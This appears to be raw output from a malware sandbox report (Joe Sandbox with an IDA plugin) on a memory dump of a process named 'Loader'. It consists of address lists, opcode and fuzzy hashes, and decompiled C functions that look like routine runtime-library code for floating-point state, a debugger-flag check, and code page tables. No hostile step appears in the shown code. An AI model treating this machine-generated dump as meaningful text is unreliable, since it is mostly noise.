0x00afe6d9
0x00afe6de
0x00afe6e3
0x00afe701
0x00000000
0x00000000
0x00000000
0x00000000
0x00afe6e3
0x00afe608
0x00afe5f4
0x00afe597
0x00afe597
0x00000000
0x00afe597
0x00afe595
0x00afe4a1
0x00afe4af
0x00afe4c4
0x00afe4d8
0x00afe4df
0x00afe4e4
0x00afe504
0x00000000
0x00afe506
0x00afe509
0x00afe5a2
0x00afe5a6
0x00000000
0x00afe5b3
0x00afe5b3
0x00afe5b7
0x00afe5b9
0x00afe5bc
0x00afe5bc
0x00afe5bf
0x00afe5c2
0x00000000
0x00afe5c7
0x00afe50f
0x00afe51c
0x00afe521
0x00afe526
0x00000000
0x00afe528
0x00afe528
0x00afe52c
0x00afe52e
0x00afe531
0x00afe531
0x00afe534
0x00afe537
0x00000000
0x00afe531
0x00afe526
0x00afe509
0x00afe4e6
0x00afe4ec
0x00afe4ef
0x00afe4f1
0x00afe4f4
0x00afe4f4
0x00afe4f7
0x00afe4fa
0x00afe53c
0x00afe53e
0x00afe543
0x00afe545
0x00afe54e
0x00afe553
0x00afe558
0x00afe703
0x00afe703
0x00afe704
0x00afe705
0x00afe706
0x00afe707
0x00afe708
0x00afe70d
0x00afe710
0x00afe711
0x00afe719
0x00afe720
0x00afe723
0x00afe724
0x00afe725
0x00afe72d
0x00afe73d
0x00afe74d
0x00afe754
0x00afe76f
0x00afe7a7
0x00afe7af
0x00000000
0x00afe771
0x00afe771
0x00afe773
0x00afe776
0x00afe779
0x00afe779
0x00afe77c
0x00afe77f
0x00afe786
0x00afe78b
0x00afe78d
0x00afe7a0
0x00afe7c2
0x00afe7c3
0x00afe7c4
0x00afe7c5
0x00afe7c6
0x00afe7c7
0x00afe7cc
0x00afe7cf
0x00afe7d2
0x00afe7d3
0x00afe7d4
0x00afe7d7
0x00afe7da
0x00afe8b2
0x00afe8b2
0x00afe8b7
0x00afe8b8
0x00afe7e0
0x00afe7e0
0x00afe7e5
0x00000000
0x00afe7eb
0x00afe7eb
0x00afe7f0
0x00afe7f2
0x00afe7f2
0x00afe7f8
0x00000000
0x00000000
0x00afe7fd
0x00afe814
0x00afe814
0x00afe7ff
0x00afe7ff
0x00afe807
0x00000000
0x00afe809
0x00afe809
0x00afe80c
0x00afe812
0x00000000
0x00000000
0x00000000
0x00000000
0x00afe812
0x00afe807
0x00afe81d
0x00afe81f
0x00000000
0x00afe825
0x00afe834
0x00afe8a0
0x00000000
0x00afe8a0
0x00afe847
0x00afe84c
0x00afe84e
0x00afe84e
0x00afe854
0x00000000
0x00000000
0x00afe859
0x00afe85b
0x00afe863
0x00000000
0x00afe865
0x00afe865
0x00afe868
0x00afe86e
0x00000000
0x00000000
0x00afe870
0x00afe86e
0x00afe863
0x00afe877
0x00afe879
0x00000000
0x00afe8af
0x00afe87b
0x00afe880
0x00afe881
0x00000000
0x00afe881
0x00afe872
0x00afe874
0x00000000
0x00afe874
0x00000000
0x00afe81f
0x00afe818
0x00afe81a
0x00000000
0x00afe81a
0x00afe7e5
0x00afe886
0x00afe88e
0x00afe896
0x00000000
0x00afe8bf
0x00afe898
0x00afe89e
0x00000000
0x00000000
0x00afe8a8
0x00afe7a2
0x00afe7a2
0x00afe7a6
0x00000000
0x00afe7a6
0x00afe7a0
0x00afe756
0x00afe756
0x00afe759
0x00afe7b2
0x00afe7bf
0x00afe7bf
0x00000000
0x00000000
0x00000000
0x00afe558
0x00afe4c6
0x00afe4c6
0x00afe59a
0x00afe59c
0x00afe6f0
0x00afe6f0
0x00000000
0x00afe6f0
0x00afe4c4
0x00afe476
0x00afe476
0x00afe479
0x00afe6f1
0x00afe6fe
0x00afe6fe

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: ErrorLastProcess_free$CurrentFeatureInfoLocalePresentProcessorTerminate
String ID:
API String ID: 4283097504-0
Opcode ID: dc4b64fd660400b6477271af3f19f370113e5dffef95cec23e1745f55320d360
Instruction ID: ea4daedf35e30ced75a15f48a5f48d86da663f58a3f087a9abe74e57f39503e5
Opcode Fuzzy Hash: dc4b64fd660400b6477271af3f19f370113e5dffef95cec23e1745f55320d360
Instruction Fuzzy Hash: 97B1077550070A9BDB34EFA4CD92AB7B3A8EF54308F14442DFB83C65A0FA71A981CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00B01C13 Relevance: .1, Instructions: 104
COMMONCrypto

Download Yara Rule

C-Code - Quality: 72%

			E00B01C13(unsigned int _a4) {
				signed int _v8;
				signed int _v32;
				void _v36;
				signed int _t56;
				signed int _t59;
				unsigned int _t61;
				unsigned int _t63;
				signed int _t70;
				signed int _t81;
				void* _t101;

				_t61 = _a4;
				_t68 = _t61 >> 0x00000010 & 0x0000003f;
				_t70 = 7;
				memset( &_v36, 0, _t70 << 2);
				asm("fnstenv [ebp-0x20]");
				_v32 = _v32 ^ (_v32 ^ ((_t61 >> 0x00000010 & 1) << 0x00000005 | ((_t61 >> 0x00000010 & 0x0000003f) >> 0x00000001 & 1) << 0x00000004 | (_t68 >> 0x00000002 & 1) << 0x00000003 | (_t68 >> 0x00000003 & 1) << 0x00000002 | _t68 >> 0x00000004 & 1 | (_t68 >> 0x00000005 & 1) + (_t68 >> 0x00000005 & 1))) & 0x0000003f;
				asm("fldenv [ebp-0x20]");
				_t63 = _t61 >> 0x00000018 & 0x0000003f;
				_t56 = (_t63 >> 0x00000005 & 1) + (_t63 >> 0x00000005 & 1);
				_t81 = (_t63 & 1) << 0x00000005 | (_t63 >> 0x00000001 & 1) << 0x00000004 | (_t63 >> 0x00000002 & 1) << 0x00000003 | (_t63 >> 0x00000003 & 1) << 0x00000002 | _t63 >> 0x00000004 & 1 | _t56;
				_t101 =  *0xb37e6c - 1; // 0x6
				if(_t101 >= 0) {
					asm("stmxcsr dword [ebp-0x4]");
					_t59 = _v8 & 0xffffffc0 | _t81 & 0x0000003f;
					_v8 = _t59;
					asm("ldmxcsr dword [ebp-0x4]");
					return _t59;
				}
				return _t56;
			}

0x00b01c1e
0x00b01c26
0x00b01c7e
0x00b01c7f
0x00b01c81
0x00b01c90
0x00b01c93
0x00b01c99
0x00b01ce3
0x00b01ce6
0x00b01ce8
0x00b01cf0
0x00b01cf2
0x00b01cff
0x00b01d01
0x00b01d04
0x00000000
0x00b01d04
0x00b01d09

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 944e7c6648fc5fd8aaaf2dcf82c56a2eb79243b31bb9d3513b5f6840096bde37
Instruction ID: d9e7c1303f0b4dfd3189fc952e23cda685d6d7198ae7a34ae1dede1b2c46dad6
Opcode Fuzzy Hash: 944e7c6648fc5fd8aaaf2dcf82c56a2eb79243b31bb9d3513b5f6840096bde37
Instruction Fuzzy Hash: B121B373F204394B7B0CC47ECC522BDB6E1C68C601745827AE8A6EA2C1D968D917E2E4

Uniqueness

Uniqueness Score: -1.00%

Function 00B01AF3 Relevance: .1, Instructions: 81
COMMONCrypto

Download Yara Rule

C-Code - Quality: 72%

			E00B01AF3(void* __ecx) {
				signed int _v8;
				signed int _v12;
				unsigned int _t55;
				signed int _t70;
				void* _t72;

				_v8 = 0;
				asm("fnstsw word [ebp-0x4]");
				_t70 = ((_v8 & 0x3f) >> 0x00000001 & 1) << 0x00000005 | ((_v8 & 0x3f) >> 0x00000002 & 1) << 0x00000003 | ((_v8 & 0x3f) >> 0x00000003 & 1) << 0x00000002 | (_t43 >> 0x00000004 & 1) + (_t43 >> 0x00000004 & 1) | (_t43 & 1) << 0x00000004 | _t43 >> 0x00000005;
				_t72 =  *0xb37e6c - 1; // 0x6
				if(_t72 >= 0) {
					asm("stmxcsr dword [ebp-0x8]");
					_t55 = _v12 & 0x0000003f;
				} else {
					_t55 = 0;
				}
				return (((_t55 >> 0x00000001 & 1) << 0x00000005 | (_t55 >> 0x00000002 & 1) << 0x00000003 | (_t55 >> 0x00000003 & 1) << 0x00000002 | (_t55 >> 0x00000004 & 1) + (_t55 >> 0x00000004 & 1) | (_t55 & 1) << 0x00000004 | _t55 >> 0x00000005) << 0x00000008 | _t70) << 0x00000010 | (_t55 >> 0x00000001 & 1) << 0x00000005 | (_t55 >> 0x00000002 & 1) << 0x00000003 | (_t55 >> 0x00000003 & 1) << 0x00000002 | (_t55 >> 0x00000004 & 1) + (_t55 >> 0x00000004 & 1) | (_t55 & 1) << 0x00000004 | _t55 >> 0x00000005 | _t70;
			}

0x00b01afe
0x00b01b02
0x00b01b47
0x00b01b49
0x00b01b4f
0x00b01b55
0x00b01b5c
0x00b01b51
0x00b01b51
0x00b01b51
0x00b01baa

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb953084a186c0237b8a029d611f6b880397837a10dde810e0dfa93ec2689263
Instruction ID: c10b1deacfb942cb8d91f4018745df37e78473572f56f599cc4fd4247e184e3f
Opcode Fuzzy Hash: cb953084a186c0237b8a029d611f6b880397837a10dde810e0dfa93ec2689263
Instruction Fuzzy Hash: 8811A723F30C255A675C816D8C132BAA5D2DBD825030F437AD826E72C4E994DE23D290

Uniqueness

Uniqueness Score: -1.00%

Function 00B1414C Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d0bfc2ef7b64e396843138ab717a1f3c293dc8ee292486fa54476fd2f3b6864
Instruction ID: a4a93b251be76c6683e7a7db01f93e72cc4dabfd373d16a294d5408c91172087
Opcode Fuzzy Hash: 6d0bfc2ef7b64e396843138ab717a1f3c293dc8ee292486fa54476fd2f3b6864
Instruction Fuzzy Hash: 5FE04F32210510ABC7219A5AC844CD6FBE8EBA97B178544A5EE59E7621D330FCA0C790

Uniqueness

Uniqueness Score: -1.00%

Function 00AFCF3A Relevance: .0, Instructions: 22
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00AFCF3A(void* __ecx) {
				char _v8;
				intOrPtr _t7;
				char _t13;

				_t13 = 0;
				_v8 = 0;
				_t7 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
				_t16 =  *((intOrPtr*)(_t7 + 8));
				if( *((intOrPtr*)(_t7 + 8)) < 0) {
					L2:
					_t13 = 1;
				} else {
					E00AF699A(_t16,  &_v8);
					if(_v8 != 1) {
						goto L2;
					}
				}
				return _t13;
			}

0x00afcf47
0x00afcf49
0x00afcf4c
0x00afcf4f
0x00afcf52
0x00afcf63
0x00afcf65
0x00afcf54
0x00afcf58
0x00afcf61
0x00000000
0x00000000
0x00afcf61
0x00afcf6a

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5723d95812905f6a1b6f5161af862748f6307f263e14757bb905799d683a281
Instruction ID: 7d0ecfb53dc83630992bbcf2877eef656483cb88b50836ca313cb06274723bbc
Opcode Fuzzy Hash: a5723d95812905f6a1b6f5161af862748f6307f263e14757bb905799d683a281
Instruction Fuzzy Hash: 54E08C3291122CEBCB14DBD9CA4499AF3ECEB84F10B11009AB601D3100C2B0DE00DBD0

Uniqueness

Uniqueness Score: -1.00%

Function 00AEECE5 Relevance: 22.9, APIs: 15, Instructions: 357
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00AEECE5(void* __edx, intOrPtr* _a4) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				intOrPtr* _v56;
				signed int _v60;
				signed int _v64;
				signed int* _v68;
				intOrPtr _v72;
				signed int* _v76;
				signed int** _v80;
				signed int** _v84;
				void* _v88;
				char _v92;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t126;
				signed int* _t129;
				intOrPtr* _t131;
				signed int* _t147;
				signed short _t150;
				signed int _t151;
				void* _t153;
				void* _t156;
				void* _t159;
				void* _t160;
				void* _t164;
				signed int _t165;
				signed int* _t166;
				signed char _t183;
				signed int* _t186;
				void* _t190;
				char _t195;
				signed char _t197;
				void* _t204;
				signed int* _t205;
				void* _t207;
				signed int* _t209;
				void* _t212;
				intOrPtr _t213;
				intOrPtr _t217;
				signed int* _t221;
				intOrPtr _t222;
				signed int _t223;
				void* _t227;
				signed int _t230;
				char* _t231;
				intOrPtr _t232;
				signed int* _t235;
				signed char* _t236;
				signed int** _t239;
				signed int** _t240;
				signed char* _t249;
				void* _t251;
				intOrPtr* _t252;
				void* _t255;
				signed int _t256;
				short* _t257;
				signed int _t260;
				signed int _t261;
				void* _t262;
				void* _t263;

				_t233 = __edx;
				_t126 =  *0xb36bac; // 0x85d5fe2b
				_v8 = _t126 ^ _t261;
				_t252 = _a4;
				_t205 = 0;
				_v56 = _t252;
				_t237 = 0;
				_v32 = 0;
				_t213 =  *((intOrPtr*)(_t252 + 0xa8));
				_v36 = 0;
				_v40 = 0;
				_v92 = _t252;
				_v88 = 0;
				if(_t213 == 0) {
					__eflags =  *(_t252 + 0x8c);
					if( *(_t252 + 0x8c) != 0) {
						asm("lock dec dword [eax]");
					}
					 *(_t252 + 0x8c) = _t205;
					_t129 = 0;
					__eflags = 0;
					 *(_t252 + 0x90) = _t205;
					 *_t252 = 0xb081c8;
					 *(_t252 + 0x94) = 0xb08448;
					 *(_t252 + 0x98) = 0xb085c8;
					 *(_t252 + 4) = 1;
					L48:
					return E00AE95ED(_t129, _t205, _v8 ^ _t261, _t233, _t237, _t252);
				}
				_t131 = _t252 + 8;
				_v52 = 0;
				if( *_t131 != 0) {
					L3:
					_v52 = E00AF4A92(1, 4);
					E00AF4AEF(_t205);
					_v32 = E00AF4A92(0x180, 2);
					E00AF4AEF(_t205);
					_t237 = E00AF4A92(0x180, 1);
					_v44 = _t237;
					E00AF4AEF(_t205);
					_v36 = E00AF4A92(0x180, 1);
					E00AF4AEF(_t205);
					_v40 = E00AF4A92(0x101, 1);
					E00AF4AEF(_t205);
					_t263 = _t262 + 0x3c;
					if(_v52 == _t205 || _v32 == _t205) {
						L43:
						E00AF4AEF(_v52);
						E00AF4AEF(_v32);
						E00AF4AEF(_t237);
						E00AF4AEF(_v36);
						_t205 = 1;
						__eflags = 1;
						goto L44;
					} else {
						_t217 = _v40;
						if(_t217 == 0 || _t237 == 0 || _v36 == _t205) {
							goto L43;
						} else {
							_t147 = _t205;
							do {
								 *(_t147 + _t217) = _t147;
								_t147 =  &(_t147[0]);
							} while (_t147 < 0x100);
							if(GetCPInfo( *(_t252 + 8),  &_v28) == 0) {
								goto L43;
							}
							_t150 = _v28;
							if(_t150 > 5) {
								goto L43;
							}
							_t151 = _t150 & 0x0000ffff;
							_v60 = _t151;
							if(_t151 <= 1) {
								L22:
								_t37 = _t237 + 0x81; // 0x81
								_t233 = 0xff;
								_v48 = _v40 + 1;
								_t153 = E00AF7A67(_t281, _t205,  *((intOrPtr*)(_t252 + 0xa8)), 0x100, _v40 + 1, 0xff, _t37, 0xff,  *(_t252 + 8), _t205);
								_t263 = _t263 + 0x24;
								_t282 = _t153;
								if(_t153 == 0) {
									goto L43;
								}
								_t156 = E00AF7A67(_t282, _t205,  *((intOrPtr*)(_t252 + 0xa8)), 0x200, _v48, 0xff, _v36 + 0x81, 0xff,  *(_t252 + 8), _t205);
								_t263 = _t263 + 0x24;
								_t283 = _t156;
								if(_t156 == 0) {
									goto L43;
								}
								_v72 = _v32 + 0x100;
								_t159 = E00AF777A(_t283, _t205, 1, _v40, 0x100, _v32 + 0x100,  *(_t252 + 8), _t205);
								_t263 = _t263 + 0x1c;
								if(_t159 == 0) {
									goto L43;
								}
								_t160 = _v32;
								_t221 = _t160 + 0xfe;
								 *_t221 = 0;
								_t233 = _v44;
								_v76 = _t221;
								_t222 = _v36;
								_t239 = _t233 + 0x80;
								 *(_t233 + 0x7f) = _t205;
								_v80 = _t239;
								 *(_t222 + 0x7f) = _t205;
								 *_t239 = _t205;
								_t240 = _t222 + 0x80;
								_v84 = _t240;
								 *_t240 = _t205;
								if(_v60 <= 1) {
									L39:
									_t223 = 0x3f;
									_push(0x1f);
									memcpy(_v32, _v32 + 0x200, _t223 << 2);
									asm("movsw");
									_t164 = memcpy(_t233, _t233 + 0x100, 0 << 2);
									_t227 = 0x1f;
									asm("movsw");
									asm("movsb");
									_t255 = _t164 + 0x100;
									_t165 = memcpy(_t164, _t255, 0 << 2);
									_t237 = _t255 + _t227 + _t227;
									asm("movsw");
									asm("movsb");
									_t252 = _v56;
									if( *(_t252 + 0x8c) != 0) {
										asm("lock xadd [ecx], eax");
										if((_t165 | 0xffffffff) == 0) {
											E00AF4AEF( *(_t252 + 0x90) - 0xfe);
											_t237 = 0x80;
											E00AF4AEF( *(_t252 + 0x94) - 0x80);
											E00AF4AEF( *(_t252 + 0x98) - 0x80);
											E00AF4AEF( *(_t252 + 0x8c));
										}
									}
									_t166 = _v52;
									 *_t166 = 1;
									 *(_t252 + 0x8c) = _t166;
									 *_t252 = _v72;
									 *(_t252 + 0x90) = _v76;
									 *(_t252 + 0x94) = _v80;
									 *(_t252 + 0x98) = _v84;
									 *(_t252 + 4) = _v60;
									L44:
									E00AF4AEF(_v40);
									_t129 = _t205;
									goto L48;
								}
								if( *(_t252 + 8) != 0xfde9) {
									_t249 =  &_v22;
									__eflags = _v22 - _t205;
									if(_v22 == _t205) {
										goto L39;
									}
									_t207 = _v32;
									while(1) {
										_t183 = _t249[1];
										__eflags = _t183;
										if(_t183 == 0) {
											break;
										}
										_t256 =  *_t249 & 0x000000ff;
										_v64 = _t256;
										__eflags = _t256 - (_t183 & 0x000000ff);
										if(_t256 > (_t183 & 0x000000ff)) {
											L37:
											_t249 =  &(_t249[2]);
											__eflags =  *_t249;
											if( *_t249 != 0) {
												continue;
											}
											break;
										}
										_v48 = _t233;
										_t186 = _t222 + 0x80 + _t256;
										_t235 = _t233 - _t222;
										__eflags = _t235;
										_t230 = _v64;
										_t257 = _t207 - 0xffffff00 + _t256 * 2;
										_v68 = _t186;
										_t209 = _t186;
										do {
											 *_t257 = 0x8000;
											_t257 = _t257 + 2;
											 *(_t235 + _t209) = _t230;
											 *_t209 = _t230;
											_t230 = _t230 + 1;
											_t209 =  &(_t209[0]);
											__eflags = _t230 - (_t249[1] & 0x000000ff);
										} while (_t230 <= (_t249[1] & 0x000000ff));
										_t233 = _v44;
										_t222 = _v36;
										_t207 = _v32;
										goto L37;
									}
									L38:
									_t205 = 0;
									goto L39;
								}
								_v44 = _t160 + 0x200;
								_t231 = _t233 + 0x100;
								_t251 = _t222 - _t233;
								_t190 = 0xffffff80;
								_v48 = _t190 - _t233;
								do {
									_push(0x32);
									asm("sbb eax, eax");
									_v44 = _v44 + 2;
									 *_v44 = (0xfffffebe + _t231 & 0xffff8000) + 0x8000;
									_t212 = _v48;
									_t195 = _t231 + _t212;
									 *_t231 = _t195;
									 *((char*)(_t251 + _t231)) = _t195;
									_t231 = _t231 + 1;
								} while (_t212 + _t231 <= 0xff);
								goto L38;
							}
							_t281 =  *(_t252 + 8) - 0xfde9;
							if( *(_t252 + 8) != 0xfde9) {
								_t236 =  &_v22;
								__eflags = _v22 - _t205;
								if(__eflags == 0) {
									goto L22;
								}
								_t232 = _v40;
								while(1) {
									_t197 = _t236[1];
									__eflags = _t197;
									if(__eflags == 0) {
										break;
									}
									_t260 =  *_t236 & 0x000000ff;
									__eflags = _t260 - (_t197 & 0x000000ff);
									if(_t260 > (_t197 & 0x000000ff)) {
										L20:
										_t236 =  &(_t236[2]);
										__eflags =  *_t236 - _t205;
										if(__eflags != 0) {
											continue;
										}
										break;
									} else {
										goto L19;
									}
									do {
										L19:
										 *((char*)(_t260 + _t232)) = 0x20;
										_t260 = _t260 + 1;
										__eflags = _t260 - (_t236[1] & 0x000000ff);
									} while (_t260 <= (_t236[1] & 0x000000ff));
									goto L20;
								}
								_t252 = _v56;
								goto L22;
							}
							E00AEA8E0(_t237, _v40 - 0xffffff80, 0x20, 0x80);
							_t263 = _t263 + 0xc;
							goto L22;
						}
					}
				}
				_push(_t131);
				_push(0x1004);
				_push(_t213);
				_push(0);
				_push( &_v92);
				_t204 = E00AF75CA(__edx);
				_t263 = _t262 + 0x14;
				if(_t204 != 0) {
					goto L43;
				}
				goto L3;
			}

0x00aeece5
0x00aeeced
0x00aeecf4
0x00aeecf9
0x00aeecfc
0x00aeecff
0x00aeed02
0x00aeed04
0x00aeed07
0x00aeed0d
0x00aeed10
0x00aeed13
0x00aeed16
0x00aeed1b
0x00aef0fe
0x00aef100
0x00aef102
0x00aef102
0x00aef105
0x00aef10b
0x00aef10b
0x00aef10d
0x00aef113
0x00aef119
0x00aef123
0x00aef12d
0x00aef134
0x00aef142
0x00aef142
0x00aeed21
0x00aeed24
0x00aeed29
0x00aeed47
0x00aeed51
0x00aeed54
0x00aeed67
0x00aeed6a
0x00aeed77
0x00aeed7a
0x00aeed7d
0x00aeed8f
0x00aeed92
0x00aeeda4
0x00aeeda7
0x00aeedac
0x00aeedb2
0x00aef0c7
0x00aef0ca
0x00aef0d2
0x00aef0d8
0x00aef0e0
0x00aef0ea
0x00aef0ea
0x00000000
0x00aeedc1
0x00aeedc1
0x00aeedc6
0x00000000
0x00aeeddd
0x00aeeddd
0x00aeeddf
0x00aeeddf
0x00aeede2
0x00aeede3
0x00aeedf9
0x00000000
0x00000000
0x00aeedff
0x00aeee05
0x00000000
0x00000000
0x00aeee0b
0x00aeee0e
0x00aeee14
0x00aeee6a
0x00aeee6d
0x00aeee77
0x00aeee8c
0x00aeee90
0x00aeee95
0x00aeee98
0x00aeee9a
0x00000000
0x00000000
0x00aeeec3
0x00aeeec8
0x00aeeecb
0x00aeeecd
0x00000000
0x00000000
0x00aeeee8
0x00aeeeee
0x00aeeef3
0x00aeeef8
0x00000000
0x00000000
0x00aeeefe
0x00aeef07
0x00aeef0d
0x00aeef10
0x00aeef13
0x00aeef16
0x00aeef19
0x00aeef1f
0x00aeef22
0x00aeef25
0x00aeef28
0x00aeef2a
0x00aeef30
0x00aeef33
0x00aeef35
0x00aef005
0x00aef00c
0x00aef00d
0x00aef018
0x00aef01d
0x00aef027
0x00aef029
0x00aef02a
0x00aef02c
0x00aef02d
0x00aef035
0x00aef035
0x00aef037
0x00aef039
0x00aef03a
0x00aef045
0x00aef04a
0x00aef04e
0x00aef05c
0x00aef067
0x00aef06f
0x00aef07d
0x00aef088
0x00aef08d
0x00aef04e
0x00aef090
0x00aef093
0x00aef099
0x00aef0a2
0x00aef0a7
0x00aef0b0
0x00aef0b9
0x00aef0c2
0x00aef0eb
0x00aef0ee
0x00aef0f4
0x00000000
0x00aef0f4
0x00aeef42
0x00aeef9b
0x00aeef9e
0x00aeefa1
0x00000000
0x00000000
0x00aeefa3
0x00aeefa6
0x00aeefa6
0x00aeefa9
0x00aeefab
0x00000000
0x00000000
0x00aeefad
0x00aeefb3
0x00aeefb6
0x00aeefb8
0x00aeeffb
0x00aeeffb
0x00aeeffe
0x00aef001
0x00000000
0x00000000
0x00000000
0x00aef001
0x00aeefc0
0x00aeefc9
0x00aeefcb
0x00aeefcb
0x00aeefcd
0x00aeefd0
0x00aeefd3
0x00aeefd6
0x00aeefd8
0x00aeefdd
0x00aeefe0
0x00aeefe3
0x00aeefe6
0x00aeefe8
0x00aeefed
0x00aeefee
0x00aeefee
0x00aeeff2
0x00aeeff5
0x00aeeff8
0x00000000
0x00aeeff8
0x00aef003
0x00aef003
0x00000000
0x00aef003
0x00aeef4b
0x00aeef4e
0x00aeef5b
0x00aeef5d
0x00aeef62
0x00aeef65
0x00aeef68
0x00aeef70
0x00aeef72
0x00aeef80
0x00aeef83
0x00aeef86
0x00aeef89
0x00aeef8b
0x00aeef8e
0x00aeef92
0x00000000
0x00aeef99
0x00aeee16
0x00aeee1d
0x00aeee37
0x00aeee3a
0x00aeee3d
0x00000000
0x00000000
0x00aeee3f
0x00aeee42
0x00aeee42
0x00aeee45
0x00aeee47
0x00000000
0x00000000
0x00aeee49
0x00aeee4f
0x00aeee51
0x00aeee60
0x00aeee60
0x00aeee63
0x00aeee65
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00aeee53
0x00aeee53
0x00aeee53
0x00aeee57
0x00aeee5c
0x00aeee5c
0x00000000
0x00aeee53
0x00aeee67
0x00000000
0x00aeee67
0x00aeee2d
0x00aeee32
0x00000000
0x00aeee32
0x00aeedc6
0x00aeedb2
0x00aeed2b
0x00aeed2c
0x00aeed31
0x00aeed35
0x00aeed36
0x00aeed37
0x00aeed3c
0x00aeed41
0x00000000
0x00000000
0x00000000

APIs

_free.LIBCMT ref: 00AEED54
_free.LIBCMT ref: 00AEED6A
_free.LIBCMT ref: 00AEED7D
_free.LIBCMT ref: 00AEED92
_free.LIBCMT ref: 00AEEDA7
GetCPInfo.KERNEL32(?,?), ref: 00AEEDF1

Part of subcall function 00AF75CA: _free.LIBCMT ref: 00AF7635

_free.LIBCMT ref: 00AEF05C
_free.LIBCMT ref: 00AEF06F
_free.LIBCMT ref: 00AEF07D
_free.LIBCMT ref: 00AEF088
_free.LIBCMT ref: 00AEF0CA
_free.LIBCMT ref: 00AEF0D2
_free.LIBCMT ref: 00AEF0D8
_free.LIBCMT ref: 00AEF0E0
_free.LIBCMT ref: 00AEF0EE

Memory Dump Source

Source File: 00000000.00000002.283555540.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.283512556.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285047388.0000000000B05000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285850162.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.285864405.0000000000B15000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.287188841.0000000000B39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_Loader.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 5036abe44c5e7d6689b9f42fd783a28adf5c816815361cf6474e17ea3bb55a1a
